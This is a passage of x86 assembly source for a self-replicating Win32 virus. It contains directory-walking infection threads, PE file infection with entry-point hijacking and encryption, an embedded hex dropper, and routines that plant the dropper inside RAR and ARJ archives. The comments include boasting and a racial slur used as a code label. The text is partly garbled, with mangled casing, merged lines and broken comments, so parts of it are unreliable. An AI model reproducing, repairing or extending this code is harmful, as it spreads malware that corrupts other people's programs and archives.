MOV ESP, [ESP 08H]
JMP TPI_RESTORESEHH
TPI_SETUPSEH:
XOR EDX, EDX
Push DWORD PTR FS: [EDX]
MOV FS: [EDX], ESP
Call Ienc_Decrypt
DD 00000000h
DD EBLOCK6-Block6
Block6 label byte
Lea EDI, [EBP WindowsDir]; Get Windows Directory
Push 7fh
Push EDI
Apicall_GetWindowsDirectorya
Add EDI, 7FH; Get System Directory
Push 7fh
Push EDI
Apicall_GetsystemDirectorya
Add EDI, 7FH; Get Current Directory
Push EDI
Push 7fh
Apicall_GetcurrentDirectorya
Eblock6 label byte
TPI_RESTORESEH:
XOR EDX, EDX
POP DWORD PTR FS: [EDX]
POP EDX
Popad
And Byte PTR [EBP TPI_SEMAPHORE], Thread_sleeping
JMP EXITTHREAD
THRPREPAREINF ENDP
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
; || thread buy for infect files ||
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
THRINFECTFILES PROC PASCAL DELTA_THREAD: DWORD
MOV EBP, DELTA_THREAD
XOR ECX, ECX
TiF_sleep:
Mov Cl, Thread_sleeping
Tif_Semaphore EQU $ -1
JECXZ TIF_SLEP
Pushhad
Call Tif_Setupseh
MOV ESP, [ESP 08H]
JMP TiF_Restoreseh
Tif_Setupseh:
XOR EDX, EDX
Push DWORD PTR FS: [EDX]
MOV FS: [EDX], ESP
Call Ienc_Decrypt
DD 00000000HDD EBLOCK7-Block7
Block7 label byte
Lea EDI, [EBP DIRECTORIES]; Pointer TO Array Of DIRS
MOV BYTE PTR [EBP MIRRORMIRROR], DIRS2INF
REQUEM:
Push EDI; SET IT As Current
Apicall_SetCurrentDirectorya
Push Edi; Preserve That Pointer
Lea ESI, [EBP EXTENSIONS_TABLE]; Pointer to Exts Table
MOV ECX, Nextensions
Dirinf:
LEA EDI, [EBP EXTENSION]; PTR to Active Extension
Movsd; Put next ONE
Pushhad
Call Infect; Infect Some Filez
Popad
Loop Dirinf
POP EDI
Add EDI, 7FH; PTR to Next Dir
Dec Byte PTR [EBP MIRRORMIRROR]; Eeeoo Supeeeeerrr ... :)
Jnz Requiem
Eblock7 Label Byte
Tif_Restoreseh:
XOR EDX, EDX
POP DWORD PTR FS: [EDX]
POP EDX
Popad
AND Byte PTR [EBP TIF_SEMAPHORE], Thread_sleeping
JMP EXITTHREAD
THRINFECTFILES ENDP
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
; || Search All the files (unsil limited reached) Matching with search mask ||
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
Infect:
Call Ienc_Decrypt
DD 00000000h
DD EBLOCK8-Block8
Block8 label byte
And DWORD PTR [EBP Infections], 00000000H; Reset County
Lea Eax, [EBP OFFSET WIN32_FIND_DATA]; FIND's Shit
Push EAX
Lea Eax, [EBP OFFSET Search_mask]
Push EAX
Apicall_findfirstfilea; Find Da First File
CMP_ EAX, Failinfect
MOV DWORD PTR [EBP SearchHandle], EAX
__1: Push DWORD PTR [EBP MODBASE]
Push DWORD PTR [EBP OLDEIP]
Push DWORD PTR [EBP NEWEIP]
CMP DWORD PTR [EBP EXTENSION], "RAR"
JZ ArchinFection
CMP DWORD PTR [EBP EXTENSION], "JRA"
JZ ArchinFection
Call infection
JMP overit
ArchinFection:
Call Infectorchives
OVERIT: POP DWORD PTR [EBP NEWEIP]
POP DWORD PTR [EBP OLDEIP] Pop DWORD PTR [EBP MODBASE]
Inc Byte PTR [EBP Infections]
CMP BYTE PTR [EBP Infections], N_INFECTIONS
JZ FailInfect
__2: Lea EDI, [EBP WFD_SZFILENAME]
Mov ECX, MAX_PATH
XOR Al, Al
Rep Stosb
Lea Eax, [EBP OFFSET WIN32_FIND_DATA]
Push EAX
Push DWORD PTR [EBP SearchHandle]
Apicall_findnextfilea
OR EAX, EAX
JNZ __1
ClosesearchHandle:
Push DWORD PTR [EBP SearchHandle]
Apicall_findclose
Failinfect:
RET
Eblock8 label byte
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
; || Infect PE file (by using wfd info) ||
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
Infection:
Call Ienc_Decrypt
DD 00000000h
DD EBLOCK9-Block9
Block9 label byte
Lea ESI, [EBP WFD_SZFILENAME]; GET FileName to Infect
Push 80h
PUSH ESI
Apicall_SetFileAttributesa; Wipe ITS Attributes
Call OpenFile; Open IT
CMP_ EAX, Cantopen
Mov DWORD PTR [EBP FILEHANDLE], EAX
MOV ECX, DWORD PTR [EBP WFD_NFILESZELOW]; 1st WE CREATE MAP with
Call CreateMap; ITS Exact Size
OR EAX, EAX
JZ Closefile
MOV DWORD PTR [EBP MAPHANDLE], EAX
MOV ECX, DWORD PTR [EBP WFD_NFILESZELOW]
Call MapFile; MAP IT
OR EAX, EAX
JZ unmapfile
MOV DWORD PTR [EBP MAPADDRESS], EAX
MOV ESI, [EAX 3CH]
Add ESI, ESI
CMP DWORD PTR [ESI], "EP"; Is IT PE?
JNZ NOINFECT
CMP DWORD PTR [ESI MARK], INF_MARK; WAS IT INFECTED?
JZ NOINFECT
Push DWORD PTR [ESI 3CH]
Push DWORD PTR [EBP MAPADDRESS]; Close All
Apicall_unmapviewoffile
Push DWORD PTR [EBP MAPHANDLE]
Apicall_closehandle
POP ECX
MOV EAX, DWORD PTR [EBP WFD_NFILESZELOW]; and map all again.
Add Eax, Virus_size
Call align
XCHG ECX, EAX
MOV DWORD PTR [EBP NEWSIZE], ECXCALL CREATEMAP
OR EAX, EAX
JZ Closefile
MOV DWORD PTR [EBP MAPHANDLE], EAX
MOV ECX, DWORD PTR [EBP Newsize]
Call MapFile
OR EAX, EAX
JZ unmapfile
MOV DWORD PTR [EBP MAPADDRESS], EAX
MOV ESI, [EAX 3CH]
Add ESI, ESI
Mov EDI, ESI
Movzx Eax, Word PTR [EDI 06H]
Dec EAX
Imul Eax, Eax, 28h
Add ESI, ESI
Add ESI, 78H
MOV EDX, [EDI 74H]
SHL EDX, 03H
Add ESI, EDX
Pushhad
CMP DWORD PTR [ESI], "LER."
JNZ Not_Reloc
CMP Word PTR [ESI 4], "CO"
JNZ Not_Reloc
XCHG EDI, ESI; PUT A New Name To .Reloc
Call generatename; section :)
NOT_RELOC:
Popad
And DWORD PTR [EDI 0A0H], 00H; Nulify THE Relocs, So They
And DWORD PTR [EDI 0A4H], 00h; Won't fuck us :)
Mov Eax, [EDI 28h]
MOV DWORD PTR [EBP OLDEIP], EAX
Mov EDX, [ESI 10h]
MOV EBX, EDX
Add Edx, [ESI 14h]
Push Edx
MOV EAX, EBX
Add Eax, [ESI 0CH]
Mov DWORD PTR [EBP NEWEIP], EAX
Mov Eax, [ESI 10h]
Add Eax, Virus_size
MOV ECX, [EDI 3CH]
Call align
MOV [ESI 10H], EAX
MOV [ESI 08H], EAX
POP EDX
Mov Eax, [ESI 10h]
Add Eax, [ESI 0CH]
MOV [EDI 50H], EAX
OR DWORD PTR [ESI 24H], Section_Flags
MOV DWORD PTR [EDI MARK], INF_MARK
Pushhad
Mov Eax, [EDI 28H]
MOV ESI, EDI
Add ESI, 0F8H-28H; Pointer to 1st Section-28h
Nigger: Add ESI, 28H; Ptr to Section Name;)
Mov Edx, Eax; Put in Edx The Original EIP
Sub EDX, [ESI 0CH]; Remove The VirtualAddress
CMP EDX, [ESI 08H]; Is Eip Pointing to this SEC?
Jae Nigger; if not, loop again
OR [ESI 24H], Section_Flags; Put Sum Attributes
Add Edx, [ESI 14H]
Add Edx, DWORD PTR [EBP MAPADDRESS]
MOV ESI, EDX
Push Edx
Push 00000100h; Alltes for Store
Push 00h; The first bytes of the inf.apicall _globalalloc; files (temportly)
MOV DWORD PTR [EBP GLOBALLOCHANDLE3], EAX
MOV ECX, 100H
Push ECX
Push EDI
Xchg EDI, EAX
REP MOVSB
POP EDI
MOV EAX, DWORD PTR [EBP NEWEIP]
Sub Eax, [EDI 28H]
Lea Edi, [EBP Newbytes]
Push EDI
Freedom or fire! Mwahahahahah!
Call Phire; Ya Wanna Sum Fire?> :)
POP ESI
POP ECX
POP EDI
REP MOVSB
Popad
Push EDI
Push Edx
Apicall_GettickCount
POP EDX
XCHG EAX, EBX
MOV DWORD PTR [EBP Key], EBX
Lea ESI, [EBP LEGACY]
XCHG EDI, EDX
Add Edi, DWORD PTR [EBP MAPADDRESS]
Push EDI
MOV ECX, Virus_Size
REP MOVSB
Mov Edi, [ESP]
Pushhad
Lea ESI, [EBP IENC_STRUC]
Call Ienc_Encrypt
Popad
Pushhad
MOV ESI, DWORD PTR [EBP GLOBALLOCHANDLE3]
Add Edi, (Offset OldBytes-Offset Virus_Start)
MOV ECX, 100H
REP MOVSB
Popad
Add Edi, Offset Crypt-Offset Virus_Start
MOV ESI, EDI
MOV ECX, ((Offset Virus_end-Offset Crypt) / 4)
CLOOP: LODSD
XOR EAX, EBX
Stosd
Loop Cloop
Mov Eax, EDI
POP EDI
MOV ECX, Virus_Size-Limit
MOV ESI, EDI
Add ESI, LIMIT
Call mmxe
POP EDI
MOV ECX, [EDI 3CH]
Call align
SUB EAX, DWORD PTR [EBP MAPAddress]
Push EAX
Push DWORD PTR [EBP MAPADDRESS]
Push EAX
Call Checksum
MOV [EDI 58H], EAX
POP ECX
Call Truncfile
Push DWORD PTR [EBP GLOBALLOCH1]; Free Some Memory
Apicall_globalfree
JMP unmapfile
NOINFECT:
Dec Byte PTR [EBP Infections]
MOV ECX, DWORD PTR [EBP WFD_NFILESZELOW]
Call Truncfile
Unmapfile:
Push DWORD PTR [EBP MAPADDRESS]
Apicall_unmapviewoffile
Closemap:
Push DWORD PTR [EBP MAPHANDLE]
Apicall_closehandle
Closefile:
Push DWORD PTR [EBP FILEHANDLE]
Apicall_closehandle
Cantopen:
Push DWORD PTR [EBP WFD_DWFileAttributes] Lea Eax, [EBP WFD_SZFILENAME]
Push EAX
Apicall_SetFileAttributesa
RET
Eblock9 label byte
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
; || Infect Given File In EDI ||
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
Infectedi:
Call Ienc_Decrypt
DD 00000000h
DD EBLOCKA-Blocka
Blocka label Byte
Push EDI
Apicall_GetfileAttributesa
CMP_ Eax, _exitinfection
MOV DWORD PTR [EBP WFD_DWFILEATTRIBUTES], EAX
MOV ESI, EDI
Call OpenFile
CMP_ Eax, _exitinfection
Push EAX
Push 00000000H
Push EAX
Apicall_GetFileSize
MOV DWORD PTR [EBP WFD_NFILESZELOW], EAX
Apicall_closehandle
Lea ESI, [EBP WFD_SZFILENAME]
XCHG ESI, EDI
Duhast: Lodsb
OR Al, Al
JZ ENGEL
Stosb
JMP duhast
Engel: Stosb
Push DWORD PTR [EBP NEWEIP]
Push DWORD PTR [EBP OLDEIP]
Push DWORD PTR [EBP MODBASE]
Call infection
POP DWORD PTR [EBP MODBASE]
POP DWORD PTR [EBP OLDEIP]
POP DWORD PTR [EBP NEWEIP]
Test Al, 00h; OVERLAPPPPPP
Org $ -1
_Exitinfection:
STC
RET
Eblocka label Byte
Infectarchiveedi:
Call Ienc_Decrypt
DD 00000000h
DD EBLOCKB-Blockb
Blockb Label Byte
Lea ESI, [EBP WFD_SZFILENAME]
XCHG EDI, ESI
PUSH ESI
Push 7fh
POP ECX
REP MOVSB
POP EDI
EOSZ_EDI
MOV EAX, [EDI-4]
MOV DWORD PTR [EBP EXTENSION], EAX
JMP Infectorchives
EBLOCKB LABEL BYTE
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
;| Infect Archives (Using WFD INFO) ||
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
;
Infinite Thanx Here to Two Guys: Starzer0 and Int13h ... without you,
I COULDN'T HAVE BEEN ABLE TO CODE THIS Part of this Virus:) Infectarchives:
Call Ienc_Decrypt
DD 00000000h
DD EBLOCKC-Blockc
Blockc label byte
Lea ESI, [EBP WFD_SZFILENAME]; Save the name to infect
Lea EDI, [EBP TMP_SZFILENAME]; LATER ...
Push 7fh
POP ECX
REP MOVSB
Push 00001000H; Alloc Memory for unpack the
PUSH 00000000H; DROPPER
Apicall_GlobalAlloc
OR EAX, EAX
JZ EXIXFECTARCHIVE
MOV DWORD PTR [EBP GLOBALLOCHANDLE], EAX
Call over_dropper
DR0P: DB 04DH, 05AH, 050H, 000H, 001H, 000H, 002H, 000H
DB 003H, 000H, 004H, 000H, 001H, 000H, 00FH, 000H
DB 001H, 000H, 0FFH, 0FFH, 000H, 002H, 000H, 0B8H
DB 000H, 007H, 000H, 040H, 000H, 001H, 000H, 01AH
DB 000H, 022H, 000H, 001H, 000H, 002H, 000H, 0BAH
DB 010H, 000H, 001H, 000H, 00Eh, 01FH, 0B4H, 009H
DB 0CDH, 021H, 0B8H, 001H, 04CH, 0CDH, 021H, 090H
DB 090H, 054H, 068H, 069H, 073H, 020H, 070H, 072H
DB 06FH, 067H, 072H, 061H, 06DH, 020H, 06DH, 075H
DB 073H, 074H, 020H, 062H, 065H, 020H, 072H, 075H
DB 06EH, 020H, 075H, 06EH, 064H, 065H, 072H, 020H
DB 057H, 069H, 06EH, 033H, 032H, 00DH, 00AH, 024H
DB 037H, 000H, 088H, 000H, 050H, 045H, 000H, 002H
DB 000H, 04CH, 001H, 004H, 000H, 001H, 000H, 0D8H
DB 026H, 09DH, 06EH, 000H, 008H, 000H, 0E0H, 000H
DB 001H, 000H, 08EH, 081H, 00BH, 001H, 002H, 019H
DB 000H, 001H, 000H, 002H, 000H, 003H, 000H, 006H
DB 000H, 007H, 000H, 010H, 000H, 003H, 000H, 010H
DB 000H, 003H, 000H, 020H, 000H, 004H, 000H, 040H
DB 000H, 002H, 000H, 010H, 000H, 003H, 000H, 002H
DB 000H, 002H, 000H, 001H, 000H, 007H, 000H, 003H
DB 000H, 001H, 000H, 00ah, 000H, 006H, 000H, 050H
DB 000H, 003H, 000H, 004H, 000H, 006H, 000H, 002H
DB 000H, 005H, 000H, 010H, 000H, 002H, 000H, 020H
DB 000H, 004H, 000H, 010H, 000H, 002H, 000H, 010HDB 000H, 006H, 000H, 010H, 000H, 00CH, 000H, 030H
DB 000H, 002H, 000H, 090H, 000H, 01CH, 000H, 040H
DB 000H, 002H, 000H, 014H, 000H, 053H, 000H, 043H
DB 04FH, 044H, 045H, 000H, 005H, 000H, 010H, 000H
DB 003H, 000H, 010H, 000H, 003H, 000H, 002H, 000H
DB 003H, 000H, 006H, 000H, 00Eh, 000H, 020H, 000H
DB 002H, 000H, 0E0H, 044H, 041H, 054H, 041H, 000H
DB 005H, 000H, 010H, 000H, 003H, 000H, 020H, 000H
DB 003H, 000H, 002H, 000H, 003H, 000H, 008H, 000H
DB 00Eh, 000H, 040H, 000H, 002H, 000H, 0C0H, 02EH
DB 069H, 064H, 061H, 074H, 061H, 000H, 003H, 000H
DB 010H, 000H, 003H, 000H, 030H, 000H, 003H, 000H
DB 002H, 000H, 003H, 000H, 00ah, 000H, 00Eh, 000H
DB 040H, 000H, 002H, 000H, 0C0H, 02EH, 072H, 065H
DB 06CH, 06FH, 063H, 000H, 003H, 000H, 010H, 000H
DB 003H, 000H, 040H, 000H, 003H, 000H, 002H, 000H
DB 003H, 000H, 00CH, 000H, 00Eh, 000H, 040H, 000H
DB 002H, 000H, 050H, 000H, 068H, 003H, 068H, 010H
DB 010H, 000H, 002H, 000H, 068H, 000H, 001H, 000H
DB 020H, 040H, 000H, 001H, 000H, 068H, 025H, 020H
DB 040H, 000H, 001H, 000H, 06AH, 000H, 001H, 000H
DB 0E8H, 009H, 000H, 003H, 000H, 033H, 0C0H, 048H
DB 050H, 0E8H, 006H, 000H, 003H, 000H, 0FFH, 025H
DB 04CH, 030H, 040H, 000H, 001H, 000H, 0FFH, 025H
DB 054H, 030H, 040H, 000H, 0D6H, 001H, 050H, 052H
DB 030H, 04EH, 020H, 02DH, 020H, 058H, 058H, 058H
DB 020H, 053H, 065H, 061H, 052H, 043H, 048H, 065H
DB 052H, 020H, 05BH, 046H, 061H, 054H, 061H, 04CH
DB 020H, 065H, 052H, 052H, 06FH, 052H, 021H, 021H
DB 021H, 05DH, 000H, 001H, 000H, 055H, 06EH, 061H
DB 062H, 06CH, 065H, 020H, 074H, 06FH, 020H, 069H
DB 06EH, 069H, 074H, 069H, 061H, 06CH, 069H, 07AH
DB 065H, 020H, 073H, 065H, 061H, 072H, 063H, 068H
DB 020H, 065H, 06EH, 067H, 069H, 06EH, 065H, 00AHDB 055H, 06EH, 06BH, 06EH, 06FH, 077H, 06EH, 020H
DB 065H, 072H, 072H, 06FH, 072H, 020H, 061H, 074H
DB 020H, 061H, 064H, 064H, 072H, 065H, 073H, 073H
DB 020H, 042H, 046H, 046H, 037H, 039H, 034H, 036H
DB 033H, 000H, 097H, 001H, 03CH, 030H, 000H, 00ah
DB 000H, 05CH, 030H, 000H, 002H, 000H, 04CH, 030H
DB 000H, 002H, 000H, 044H, 030H, 000H, 00ah, 000H
DB 067H, 030H, 000H, 002H, 000H, 054H, 030H, 000H
DB 016H, 000H, 074H, 030H, 000H, 006H, 000H, 082H
DB 030H, 000H, 006H, 000H, 074H, 030H, 000H, 006H
DB 000H, 082H, 030H, 000H, 006H, 000H, 055H, 053H
DB 045H, 052H, 033H, 032H, 02EH, 064H, 06CH, 06CH
DB 000H, 001H, 000H, 04BH, 045H, 052H, 04EH, 045H
DB 04CH, 033H, 032H, 02EH, 064H, 06CH, 06CH, 000H
DB 003H, 000H, 04DH, 065H, 073H, 073H, 061H, 067H
DB 065H, 042H, 06FH, 078H, 041H, 000H, 003H, 000H
DB 045H, 078H, 069H, 074H, 050H, 072H, 06FH, 063H
DB 065H, 073H, 073H, 000H, 072H, 001H, 010H, 000H
DB 002H, 000H, 014H, 000H, 003H, 000H, 006H, 030H
DB 00BH, 030H, 021H, 030H, 027H, 030H, 000H, 0F0H
DB 003H
SDR0P EQU ($ -offset DR0P)
Over_dropper:
POP ESI
MOV ECX, SDR0P; Unpack in Allocated Memory
XCHG EDI, EAX; The Dropper
Call Lsce_unpack
Push 00000000H; Create the Dropper on
Push 00000080h; a Temporal File Called
Push 00000002h; Legacy.TMP (That Will B)
Push 00000000H; ERSED LATER)
Push 00000001H
Push 40000000H
Lea Edi, [EBP HATE]
Push EDI
Apicall_createfilea
Push Eax; Write IT, SUCKA!
Push 00000000H
LEA EBX, [EBP IOBYTES]
Push EBX
Push 00001000H
Push DWORD PTR [EBP GLOBALLOCHANDLE]
Push EAX
Apicall_writefile
Apicall_closehandle
Call O_TMP
Hate DB "Legacy.TMP", 0; Infect the Dropped file
O_TMP: POP EDI
Call Infectedilea Eax, [EBP WIN32_FIND_DATA]; FIND's Shit
Push EAX
Lea Eax, [EBP HATE]
Push EAX
Apicall_findfirstfilea
INC EAX
JZ Cantopenarchive
Dec EAX
Push DWORD PTR [EBP WFD_NFILESZELOW]
POP DWORD PTR [EBP Infdroppersize]
Push EAX
Apicall_findclose
Lea ESI, [EBP HATE]
Call OpenFile
Mov DWORD PTR [EBP FILEHANDLE], EAX
Push DWORD PTR [EBP INFDROPPERSIZE]
Push 00000000H
Apicall_GlobalAlloc
OR EAX, EAX
JZ Closefilearchive
MOV DWORD PTR [EBP GLOBALLOCHANDLE2], EAX
Push 00h
Lea EBX, [EBP NumbytesRead]
Push EBX
Push DWORD PTR [EBP INFDROPPERSIZE]
Push EAX
Push DWORD PTR [EBP FILEHANDLE]
Apicall _readfile
Push DWORD PTR [EBP FILEHANDLE]
Apicall_closehandle
Lea ESI, [EBP TMP_SZFILENAME]; GET FileName to Infect
Push 80h
PUSH ESI
Apicall_SetFileAttributesa; Wipe ITS Attributes
Call OpenFile; Open IT
CMP_ Eax, Cantopenarchive
Mov DWORD PTR [EBP FILEHANDLE], EAX
Push 00h
Push EAX
Apicall_GetFileSize
MOV DWORD PTR [EBP ArchiveSize], EAX
MOV ECX, DWORD PTR [EBP EXTEN]
; CMP ECX, "RAR"
JZ Infectrar
CMP ECX, "JRA"
JZ Infectorj
; -------------
; RAR Infection
; -------------
Infectrar:
Push 00h; See if IT Was Previously
Push 00h; Infected ...
SUB EAX, DWORD PTR [EBP Infdroppersize]
Sub Eax, SRarheadersize
Push EAX
Push DWORD PTR [EBP FILEHANDLE]
Apicall_setfilepointer
INC EAX
JZ Trytoinfectrar
Dec EAX
Push 00h
Lea EBX, [EBP NumbytesRead]
Push EBX
PUSH 50D
Lea EBX, [EBP ArchiveBuffer]
Push EBX
Push DWORD PTR [EBP FILEHANDLE]
Apicall _readfile
OR EAX, EAX
JZ Trytoinfectrar
CMP Word PTR [EBP ArchiveBuffer 14h], Archive_Mark
JZ Closefilearchive
Leet's Fill Properly Rar Fields:) Trytoinfectrar:
Lea EDI, [EBP RARNAME]; Generate a Random 6 Char Name
Call generatename; for the DR0PPER;)
MOV EDI, DWORD PTR [EBP Infdroppersize]
MOV DWORD PTR [EBP RARCOMPRESSED], EDI
MOV DWORD PTR [EBP RARORIGINAL], EDI
MOV ESI, DWORD PTR [EBP GLOBALLOCHANDLE2]
Call CRC32
MOV DWORD PTR [EBP RARCRC32], EAX
Lea ESI, [EBP RARHEADER 2]
Mov EDI, SRARHEADERSIZE-2
Call CRC32
MOV Word PTR [EBP RARHEADERCRC], AX
Push 02h
Push 00h
Push 00h
Push DWORD PTR [EBP FILEHANDLE]
Apicall_setfilepointer
Push 00h
LEA EBX, [EBP IOBYTES]
Push EBX
Push Srarheadersize
Lea EBX, [EBP RARHEADER]
Push EBX
Push DWORD PTR [EBP FILEHANDLE]
Apicall_writefile
Push 00h
LEA EBX, [EBP IOBYTES]
Push EBX
Push DWORD PTR [EBP INFDROPPERSIZE]
Push DWORD PTR [EBP GLOBALLOCHANDLE2]
Push DWORD PTR [EBP FILEHANDLE]
Apicall_writefile
JMP CloseFilearchive
; -------------
Arj INFECTION
; -------------
Infectorj:
Push 00h; Let's see if it is infected
Push 00h
SUB EAX, DWORD PTR [EBP Infdroppersize]
Sub Eax, Sarjtotalsize 4
Push EAX
Push DWORD PTR [EBP FILEHANDLE]
Apicall_setfilepointer
INC EAX
JZ Trytoinfectorj
Dec EAX
Push 00h
Lea EBX, [EBP NumbytesRead]
Push EBX
PUSH 50D
Lea EBX, [EBP ArchiveBuffer]
Push EBX
Push DWORD PTR [EBP FILEHANDLE]
Apicall _readfile
OR EAX, EAX
JZ Trytoinfectorj
CMP Word PTR [EBP ArchiveBuffer], 0EA60H
Jnz CloseFilearchive
CMP Word PTR [EBP ArchiveBuffer 0Ch], Archive_Mark
JZ Closefilearchive
; Let's Fill Properly Arj Fields :)
Trytoinfectorj:
Lea EDI, [EBP ArjFileName]
Call generatename
Push 02h
Push 00h
Push 00h
Push DWORD PTR [EBP FileHandle] APICALL _SETFILEPOINTER
XCHG ECX, EDX
Mov Edx, EAX
Sub EDX, 4
SBB ECX, 1
Add ECX, 1
Push 00h
Push 00h
Push Edx
Push DWORD PTR [EBP FILEHANDLE]
Apicall_setfilepointer
MOV EDI, DWORD PTR [EBP Infdroppersize]
MOV DWORD PTR [EBP ARJCompress], EDI
MOV DWORD PTR [EBP Arjoriginal], EDI
MOV ESI, DWORD PTR [EBP GLOBALLOCHANDLE2]
Call CRC32
MOV DWORD PTR [EBP ArjCrc32], EAX
Push 00h
LEA EBX, [EBP IOBYTES]
Push EBX
Push Sarjheader
Lea EBX, [EBP Arjheader]
Push EBX
Push DWORD PTR [EBP FILEHANDLE]
Apicall_writefile
Lea ESI, [EBP ARJHSMSIZE]
Mov Edi, Sarjcrc32Size
Call CRC32
MOV DWORD PTR [EBP ArjheaderCrc], EAX
Push 00h
LEA EBX, [EBP IOBYTES]
Push EBX
Push Sarjsecondside
Lea EBX, [EBP ARJSECONDSIDE]
Push EBX
Push DWORD PTR [EBP FILEHANDLE]
Apicall_writefile
Push 00h
LEA EBX, [EBP IOBYTES]
Push EBX
Push DWORD PTR [EBP INFDROPPERSIZE]
Push DWORD PTR [EBP GLOBALLOCHANDLE2]
Push DWORD PTR [EBP FILEHANDLE]
Apicall_writefile
And Word PTR [EBP Arjheadsiz], 0000H; this shit is needed
Push 00h
LEA EBX, [EBP IOBYTES]
Push EBX
Push 04h
Lea EBX, [EBP Arjheader]
Push EBX
Push DWORD PTR [EBP FILEHANDLE]
Apicall_writefile
Closefilearchive:
Push DWORD PTR [EBP FILEHANDLE]
Apicall_closehandle
Cantopenarchive:
Push DWORD PTR [EBP GLOBALLOCHANDLE]
Apicall_globalfree
Push DWORD PTR [EBP GLOBALLOCHANDLE2]
Apicall_globalfree
Lea Edi, [EBP HATE]
Push EDI
Apicall_Deletefilea
ExitInfectarchive:
RET
Eblockc label byte
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
; || Some miscellaneous routines ||
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] [] GetUsefulinfo:
Pushs "user32"
Apicall_LoadLibrarya
Push EAX
Lea ESI, [EBP @ FindWindowa]
Lea Edi, [EBP @@ offsetzuser32]
Call getapis
Apicall_freelibrary
Pushs "Advapi32"
Apicall_LoadLibrarya
Push EAX
Lea ESI, [EBP @ regcreateKeyexa]
Lea Edi, [EBP @@ offsetzadvapi32]
Call getapis
Apicall_freelibrary
RET
Input:
ESI = Program Return Address
Output:
EAX = kernel32 imagebase
;
Getk32 proc
Pushhad
Call getk32_seh
MOV ESP, [ESP 08H]
Wefailed:
Popad
Pushhad
Mov ESI, KERNEL_W9X
Call Checkmz
JNC Weigotk32
Mov ESI, KERNEL_WNT
Call Checkmz
JNC Weigotk32
Mov ESI, KERNEL_W2K
Call Checkmz
JNC Weigotk32
XOR ESI, ESI
JMP Weigotk32
Getk32_seh:
XOR EDX, EDX
Push DWORD PTR FS: [EDX]
MOV FS: [EDX], ESP
And ESI, 0FFFFF0000H
_ @ 1: CMP Word PTR [ESI], "ZM"
JZ Checkpe
_ @ 2: SUB ESI, 00010000H
LOOP _ @ 1
JMP Wefailed
Checkpe:
Mov EDI, [ESI 3CH]
Add Edi, ESI
CMP DWORD PTR [EDI], "EP"
JNZ _ @ 2
Wegotk32:
XOR EDX, EDX
POP DWORD PTR FS: [EDX]
POP EDX
MOV [ESP.PUSHAD_EAX], ESI
Popad
RET
Getk32 ENDP
Input:
; Eax = base address of the library where search the Apis
ESI = Pointer to an array of crc32 of the apis we want to search
EDI = Pointer to Where store the Apis
Output:
Nothing.
;
GetApis Proc
Push Eax; Eax = Handle of Module
POP DWORD PTR [EBP TMPMODULEBASE]
APIS33K:
Lodsd; Get in Eax The CRC32 OF API
Push ESI EDI
Call getapi_et_crc32
POP EDI ESI
STOSD; Save In [edi] The API Address
CMP BYTE PTR [ESI], BILLY_BEL; LAST API?
JNZ Apis33k; Yeah, Get Outta Here
RET
GetApis Endp
Input:
EAX = crc32 of the API We want to know its address
Output:
EAX = API Address
;
GetAPi_ET_CRC32 Proc
XOR EDX, EDX
XCHG Eax, EDX; PUT CRC32 of Da API IN EDX
MOV Word PTR [EBP Counter], AX; Reset Counter
Mov ESI, 3CH
Add ESI, [EBP TMPMODULEBASE]; Get PE Header of Module
Lodsw
Add Eax, [EBP TMPMODULEBASE]; NORMALIZE
MOV ESI, [EAX 78H]; Get a Pointer to ITS
Add ESI, 1CH; Export Table
Add ESI, [EBP TMPMODULEBASE]
Lea EDI, [EBP AddResStableva]; Pointer to the Address Table
Lodsd; Get AddresStable value
Add Eax, [EBP TMPMODULEBASE]; NORMALIZE
Stosd; and store in its variable
Lodsd; Get NameTable value
Add Eax, [EBP TMPMODULEBASE]; NORMALIZE
Push Eax; Put IT in Stack
StOSD; Store In Its Variable
Lodsd; Get OrdinalTable Value
Add Eax, [EBP TMPMODULEBASE]; NORMALIZE
StOSD; Store
POP ESI; ESI = Nametable VA
@? _ 3: Push ESI; Save Again
Lodsd; Get Pointer to an API Name
Add Eax, [EBP TMPMODULEBASE]; NORMALIZE
XCHG EDI, EAX; Store PTR in Edi
MOV EBX, EDI; And in EBX
Push Edi; Save EDI
EOSZ_EDI
POP ESI; ESI = Pointer to API Name
SUB EDI, EBX; EDI = API Name Size
Push EDX; Save API's CRC32
Call CRC32; GET ACTUAL API's CRC32
POP EDX; Restore API's CRC32
CMP EDX, EAX; Are Them Equal?
JZ @? _ 4; if Yes, WE GOT IT
POP ESI; Restore Ptr To API Name
Add ESI, 4; Get the next
Inc Word PTR [EBP Counter]; and increase the counter
JMP @? _ 3; Get Another API!
@? _ 4:
POP ESI; Remove Shit from stack
Movzx Eax, Word PTR [EBP Counter]; AX = Counter
SHL EAX, 1; * 2 (It's an array of words)
Add Eax, DWORD PTR [EBP OrdinalTableva]; Normalize
